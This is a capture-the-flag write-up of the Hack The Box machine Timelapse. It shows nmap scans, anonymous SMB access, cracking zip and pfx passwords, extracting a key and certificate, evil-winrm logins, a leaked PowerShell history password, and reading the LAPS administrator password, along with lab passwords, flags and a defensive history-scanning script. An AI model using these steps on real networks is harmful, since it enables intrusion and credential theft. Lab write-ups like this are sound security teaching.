Timelapse-htb-writeup

0x00 Skills covered

Skills in this chapter: anonymous SMB access, using zip2john, using pfx2john, extracting the private key and certificate from a .pfx, logging in with evil-winrm using a key and certificate, sensitive information leaked through the PowerShell command history, membership in the LAPS privileged group

Reference: https://0xdf.gitlab.io/2022/08/20/htb-timelapse.html

0x01 Getting user access

1. Get the target IP address: 10.10.11.152

2. Scan for open ports

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- -sU --min-rate=10000 10.10.11.152
[sudo] kali 的密码:
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 10.10.11.152 -oG allports
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5986/tcp open wsmans
9389/tcp open adws
49667/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49727/tcp open unknown


┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p53,88,135,139,389,445,593,636,3268,3269,5986,9389,49667,49673,49674,49727 -sV -sC --min-rate=10000 10.10.11.152
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-19 21:51 CST
Nmap scan report for 10.10.11.152
Host is up (0.30s latency).

PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-03-19 21:52:08Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| tls-alpn:
|_ http/1.1
|_ssl-date: 2024-03-19T21:55:21+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after: 2022-10-25T14:25:29
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49727/tcp open unknown
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m58s
| smb2-time:
| date: 2024-03-19T21:54:27
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

3. Add the domain names to the local hosts file

┌──(root㉿offsec)-[~]
└─# echo '10.10.11.152 dc01.timelapse.htb timelapse.htb' >> /etc/hosts

4. Check whether anonymous SMB access is allowed

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient -L 10.10.11.152 -N

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.152 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

5. Go through the shares one by one and see what turns up

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.11.152\\SYSVOL -N
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \> dir
NT_STATUS_ACCESS_DENIED listing \*
smb: \> pwd
Current directory is \\10.10.11.152\SYSVOL\
smb: \> exit

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.11.152\\Shares -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Oct 25 23:39:15 2021
.. D 0 Mon Oct 25 23:39:15 2021
Dev D 0 Tue Oct 26 03:40:06 2021
HelpDesk D 0 Mon Oct 25 23:48:42 2021

6367231 blocks of size 4096. 1264689 blocks available
smb: \> cd Dev\
smb: \Dev\> ls
. D 0 Tue Oct 26 03:40:06 2021
.. D 0 Tue Oct 26 03:40:06 2021
winrm_backup.zip A 2611 Mon Oct 25 23:46:42 2021

6367231 blocks of size 4096. 1263607 blocks available
smb: \Dev\> get winrm_backup.zip
getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (1.0 KiloBytes/sec) (average 1.0 KiloBytes/sec)
smb: \Dev\> cd ../
smb: \> cd HelpDesk\
smb: \HelpDesk\> ls
. D 0 Mon Oct 25 23:48:42 2021
.. D 0 Mon Oct 25 23:48:42 2021
LAPS.x64.msi A 1118208 Mon Oct 25 22:57:50 2021
LAPS_Datasheet.docx A 104422 Mon Oct 25 22:57:46 2021
LAPS_OperationsGuide.docx A 641378 Mon Oct 25 22:57:40 2021
LAPS_TechnicalSpecification.docx A 72683 Mon Oct 25 22:57:44 2021

6367231 blocks of size 4096. 1260293 blocks available
smb: \HelpDesk\>


┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.11.152\\NETLOGON -N
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \> exit

6. The downloaded archive is password-protected; convert it to a crackable hash format and crack it

┌──(kali㉿offsec)-[~/Desktop]
└─$ zip2john winrm_backup.zip > hash
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy (winrm_backup.zip/legacyy_dev_auth.pfx)
1g 0:00:00:00 DONE (2024-03-19 23:03) 3.448g/s 11977Kp/s 11977Kc/s 11977KC/s suzyqzb..superkebab
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

7. The password was recovered, but the extracted legacyy_dev_auth.pfx file is itself password-protected, so it needs cracking as well

┌──(kali㉿offsec)-[~/Desktop]
└─$ pfx2john legacyy_dev_auth.pfx > hash1

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo john hash1 --wordlist=/usr/share/wordlists/rockyou.txt
[sudo] kali 的密码:
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 128/128 ASIMD 4x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy (legacyy_dev_auth.pfx)
1g 0:00:01:13 DONE (2024-03-19 23:07) 0.01357g/s 43873p/s 43873c/s 43873C/s thyriana..thsco04
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

8. After some digging, this turns out to be a certificate bundle with a private key; a certificate and a key can be separated out of it, and those two files are enough to log in to the server

https://www.ibm.com/docs/en/arl/9.7?topic=certification-extracting-certificate-keys-from-pfx-file

9. Extract the key. With the password, I can extract the key and the certificate. When extracting the key, it asks for the import password (I'll supply "thuglegacy") and then for a passphrase for the output .pem file (anything I like, at least four characters):

┌──(kali㉿offsec)-[~/Desktop]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key-enc
Enter Import Password:
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:

10. I'll decrypt the key using the passphrase set above so I don't have to remember it:

┌──(kali㉿offsec)-[~/Desktop]
└─$ openssl rsa -in legacyy_dev_auth.key-enc -out legacyy_dev_auth.key
Enter pass phrase for legacyy_dev_auth.key-enc:
writing RSA key

11. And dump the certificate:

┌──(kali㉿offsec)-[~/Desktop]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacyy_dev_auth.crt
Enter Import Password:

12. evil-winrm is the best tool for connecting to WinRM from a Linux host. Checking its usage shows how I'll connect with these keys:

-S - enable SSL, since I'm connecting to port 5986
-c legacyy_dev_auth.crt - supply the public certificate
-k legacyy_dev_auth.key - supply the private key
-i timelapse.htb - the host to connect to

13. Try to connect

┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i timelapse.htb -S -k legacyy_dev_auth.key -c legacyy_dev_auth.crt

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami
timelapse\legacyy
*Evil-WinRM* PS C:\Users\legacyy\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\legacyy\Desktop> dir


Directory: C:\Users\legacyy\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 3/19/2024 2:46 PM 34 user.txt


*Evil-WinRM* PS C:\Users\legacyy\Desktop>

14. Read the first flag

*Evil-WinRM* PS C:\Users\legacyy\Desktop> type user.txt
52787067844ef122efe2d2a0dc2fdfc2
*Evil-WinRM* PS C:\Users\legacyy\Desktop>

0x02 Getting system access

15. Enumerate the current user and their account details

*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami
timelapse\legacyy
*Evil-WinRM* PS C:\Users\legacyy\Documents> net user legacyy
User name legacyy
Full Name Legacyy
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 10/23/2021 12:17:10 PM
Password expires Never
Password changeable 10/24/2021 12:17:10 PM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 3/20/2024 3:18:33 AM

Logon hours allowed All

Local Group Memberships *Remote Management Use
Global Group memberships *Domain Users *Development
The command completed successfully.

*Evil-WinRM* PS C:\Users\legacyy\Documents>

16. Check the current user's privileges

*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\legacyy\Documents>



17. Query the members of the Domain Users group

*Evil-WinRM* PS C:\Users\legacyy\Documents> net group "Domain Users" /domain
Group name Domain Users
Comment All domain users

Members

-------------------------------------------------------------------------------
Administrator babywyrm krbtgt
legacyy payl0ad sinfulz
svc_deploy thecybergeek TRX
The command completed successfully.

*Evil-WinRM* PS C:\Users\legacyy\Documents>

18. Check the PowerShell command history (HistorySavePath reports the file for the current remote session; the interactive ConsoleHost_history.txt in the same directory is the one of interest)

*Evil-WinRM* PS C:\Users\legacyy\Documents> (Get-PSReadlineOption).HistorySavePath
C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ServerRemoteHost_history.txt
*Evil-WinRM* PS C:\Users\legacyy\Documents>


*Evil-WinRM* PS C:\Users\legacyy\Documents> cd C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\
*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> dir


Directory: C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/3/2022 11:46 PM 434 ConsoleHost_history.txt


*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> cat ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine>
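The history file above is the kind of artefact a defender should be sweeping user profiles for. As an added example (not from this writeup), the Python below scans PSReadLine history text for plaintext credential patterns and returns each hit with the secret redacted so it can be reported safely; the sample history and its passwords are constructed placeholders, not the real ones.

```python
import re

# Constructed sample of a ConsoleHost_history.txt, modelled on the one in
# the writeup. Password values are placeholders, not the real ones.
SAMPLE_HISTORY = """whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'Placeh0lder!Pass' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
net user tempadmin 'An0therPlaceh0lder' /add
exit
"""

# Each rule is (name, regex); the regex's "secret" group is the literal to redact.
RULES = [
    ("ConvertTo-SecureString plaintext literal",
     re.compile(r"ConvertTo-SecureString\s+(?P<q>['\"])(?P<secret>.+?)(?P=q).*-AsPlainText", re.I)),
    ("password passed on command line",
     re.compile(r"(?:^|\s)(?:-p(?:ass(?:word)?)?|/p(?:ass(?:word)?)?)\s+(?P<q>['\"])(?P<secret>.+?)(?P=q)", re.I)),
    ("net user with inline password",
     re.compile(r"net\s+user\s+\S+\s+(?P<q>['\"]?)(?P<secret>[^\s'\"]+)(?P=q)\s+/add", re.I)),
]


def scan_history(text):
    """Return (line_no, rule_name, redacted_line) for each line leaking a secret."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for name, rx in RULES:
            m = rx.search(line)
            if m:
                redacted = line[:m.start("secret")] + "<REDACTED>" + line[m.end("secret"):]
                findings.append((line_no, name, redacted))
                break  # one finding per line is enough for reporting
    return findings


if __name__ == "__main__":
    for line_no, name, redacted in scan_history(SAMPLE_HISTORY):
        print(f"line {line_no}: {name}: {redacted}")
```

Point it at every PSReadLine directory under C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\ and treat any hit as a credential that must be rotated.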

19. A username and password were found; try logging in with them

┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i timelapse.htb -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents>

20. Continue checking the current user's details and privileges

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami
timelapse\svc_deploy
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> net user svc_deploy
User name svc_deploy
Full Name svc_deploy
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 10/25/2021 12:12:37 PM
Password expires Never
Password changeable 10/26/2021 12:12:37 PM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 3/20/2024 3:50:13 AM

Logon hours allowed All

Local Group Memberships *Remote Management Use
Global Group memberships *LAPS_Readers *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc_deploy\Documents>

21. Look into the unusual group this user was just found to belong to

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> net groups "LAPS_Readers" /domain
Group name LAPS_Readers
Comment

Members

-------------------------------------------------------------------------------
svc_deploy
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc_deploy\Documents>

22. After some more research, the following information turned up

With LAPS, the DC manages the local administrator passwords of the computers in the domain. It is common to create a group of users and grant them permission to read these passwords, which gives trusted administrators access to every local administrator password.

To read a LAPS password, I just need to use Get-ADComputer and specifically request the ms-mcs-admpwd attribute:

Get-ADComputer DC01 -property 'ms-mcs-admpwd'

23. Following that hint, retrieve the administrator password

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-ADComputer DC01 -property 'ms-mcs-admpwd'


DistinguishedName : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
DNSHostName : dc01.timelapse.htb
Enabled : True
ms-mcs-admpwd : S92[l]pPJ8bYZI%0dS1siQ;1
Name : DC01
ObjectClass : computer
ObjectGUID : 6e10b102-6936-41aa-bb98-bed624c9b98f
SamAccountName : DC01$
SID : S-1-5-21-671920749-559770252-3318990721-1000
UserPrincipalName :



*Evil-WinRM* PS C:\Users\svc_deploy\Documents>

24. Try logging in with the password obtained

┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i timelapse.htb -S -u administrator -p 'S92[l]pPJ8bYZI%0dS1siQ;1'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cd ../../
*Evil-WinRM* PS C:\Users> dir


Directory: C:\Users


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/23/2021 11:27 AM Administrator
d----- 10/25/2021 8:22 AM legacyy
d-r--- 10/23/2021 11:27 AM Public
d----- 10/25/2021 12:23 PM svc_deploy
d----- 2/23/2022 5:45 PM TRX


*Evil-WinRM* PS C:\Users> cd TRX
*Evil-WinRM* PS C:\Users\TRX> cd Desktop
*Evil-WinRM* PS C:\Users\TRX\Desktop>

25. Get the final flag

*Evil-WinRM* PS C:\Users\TRX\Desktop> dir


Directory: C:\Users\TRX\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 3/20/2024 2:59 AM 34 root.txt


*Evil-WinRM* PS C:\Users\TRX\Desktop> cat root.txt
dc9c080e10210fc114e26296d2500f01
*Evil-WinRM* PS C:\Users\TRX\Desktop>

0x03 Proof of completion

https://www.hackthebox.com/achievement/machine/1705469/452

Source: https://sh1yan.top/2024/03/19/Timelapse-htb-writeup/
Author: shiyan
Published: 2024-03-19